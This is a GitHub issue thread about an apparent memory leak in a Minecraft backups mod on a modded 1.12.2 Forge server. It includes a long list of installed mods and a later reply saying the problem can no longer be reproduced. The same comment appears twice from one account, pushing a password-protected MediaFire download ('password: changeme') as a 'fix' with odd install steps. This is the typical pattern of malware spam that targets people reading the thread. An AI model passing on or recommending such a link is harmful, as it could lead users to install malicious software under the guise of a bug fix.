### ISSUE TITLE
Apparent memory leak

### ISSUE THREAD

**Issue by Pixelguru26** [Silly511/Backups-Mod#45]
Problem: steadily increasing memory usage on 1.12.2 forge (14.23.5.2860) server with this mod installed. Removing the mod returns the server to a steady state. Notably there is a single complaint of a possible memory leak regarding a byte array from the netty library in the logs, though further detail is inaccessible due to hosting service restrictions.

With mod installed: memory management no longer exhibits typical behavior and the increase occurs steadily regardless of player actions (loading chunks, unloading chunks, removing high stress entities, etc). This does eventually lead the server to overflow into swap and crash shortly thereafter. The problem may very well be due to an interaction with other mods, but I have no further insight in that regard at this time.

Other mods installed:
- mixinbooter 8.8
- bspkrs Core 7.6.0.1
- Additional Lights 1.2.1
- Apotheosis 1.12.5
- Apple Skin 1.0.14
- Aquaculture 1.6.8
- AutoRegLib 1.3-32
- Backpacked 1.4.3
- Baubles 1.5.2
- Biomes o' Plenty 7.0.1.2445
- Buildcraft all 7.99.24.8
- Builder's Bag 1.4.2.25
- Chicken Chunks 2.4.2.74 - Tested as a high priority culprit, currently absolved
- Chisel 1.0.2.45
- Chisels and Bits 14.33 - Known to have its own memory leaks, may be interacting poorly
- Chococraft 0.9.1.52
- Clumps 3.1.2
- CodeChicken Lib 3.2.3.358
- CoFH Core 4.6.6.1
- CoFH World 1.4.0.1
- Collective 3.0
- Coro Util 1.2.37
- Corpse 1.0.8
- CraftTweaker 2 4.1.20.700
- Connected Texture Mod 1.0.2.31 (as chisel dependency)
- Cyclops Core 1.6.7
- Dimensional Doors 3.2.0
- Dynamic Lights 1.12.2-?
- Edit Mob Drops 1.4.3
- Electroblob's Wizardry 4.3.14
- Enchant Exchange (enchxchg) 1.2.14
- Ender Storage 2.4.6.137
- EvilCraft 0.10.78
- Evil Notch Lib 1.2.3.08
- Extra Planets 0.8.0
- Extra Utils 2 1.9.9
- Fast Async World Edit 19.11.13-5505943-1282-22.3.5
- Floodlights 1.4.4-22
- Forgelin 1.8.4
- Galacticraft 4.0.6
- Gotta Go Fast 1.1
- Guide API 2.1.8.63
- Hammer Lib 12.2.50
- Horror Elements Mod 1.5.2
- Hwyla 1.8.26-B41
- Ice and Fire 1.9.1
- iChun Util 7.2.2
- Item Renderer Reborn pre-6.3.1
- Industrial Renewal 0.21.8
- Inspirations 0.2.9
- Inventory Tweaks 1.63
- JEI 4.16.1.301
- Journey Map 5.7.1p2
- L Library 1.7.20
- Lost Cities 2.0.22
- Mahou Tsukai 1.19.55
- Mantle 1.3.3.55
- Mcjty Lib 3.5.4
- MCW (Macaw's) Bridges 1.0.6b
- MJR Legends Lib 1.2.1
- ModTweaker 4.0.20.11
- More Planets 2.3.3-GC4.0.6
- MT Lib 3.0.7
- Nature's Compass 1.8.5
- NoCube's SRP Combad Addon 3.0.0
- NoCube's SRB Nests Addon 3.0.0
- NoCube's SRP Survival Addon 3.0.0
- Non Conflict Keys 1.0.0
- Not Enough IDs 1.5.4.4
- Not Enough Items 2.4.3.245
- Not Enough Wands 1.8.1
- NTM Extended 2.0.2
- OreLib 3.6.0.1
- Placebo 1.6.1
- Quark r1.6-179
- Reborn Core 3.19.5
- Redirectionor 1.4
- Redstone Flux 2.1.1.1
- Refined Storage 1.6.16
- Refined Storage Addons 0.4.5
- RF Tools 7.73
- Gauges and Switches 1.2.8
- Space Ambient 0.0.1
- Scape and Run Parasites 1.9.21
- Starter Kit 2.4
- Stevekung's Lib 1.3.1
- Technical Lights 1.0.1.2
- Thaumcraft 6.1.BETA26
- Thaumic Additions 12.7.9
- Thaumic Augmentation 2.1.11
- Thaumic JEI 1.6.0.27
- Thaumic Periphery 0.3.1
- Thaumic Wonders 1.8.4
- Thermal Dynamics 2.5.6.1
- Thermal Expansion 5.5.7.1
- Thermal Foundation 2.6.7.1
- TreeChop 0.14.7
- Trumpet Skeletons 1.0.2.1
- WOOT 1.4.11
- World Edit 6.1.10
- Zettai Magic 1.4.7

I will attempt to isolate the problem further in the next few days.

If there is any additional information or assistance I may be able provide, do let me know and I will be happy to assist. This mod is well worth the investment of time and effort.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Pixelguru26** [comment]
Not only have I not been able to isolate the issue, now I can't even reproduce it properly. (note: I have not intentionally changed anything with the server installation, and the issue was previously reliably reproducable)
So I guess...problem solved-ish?
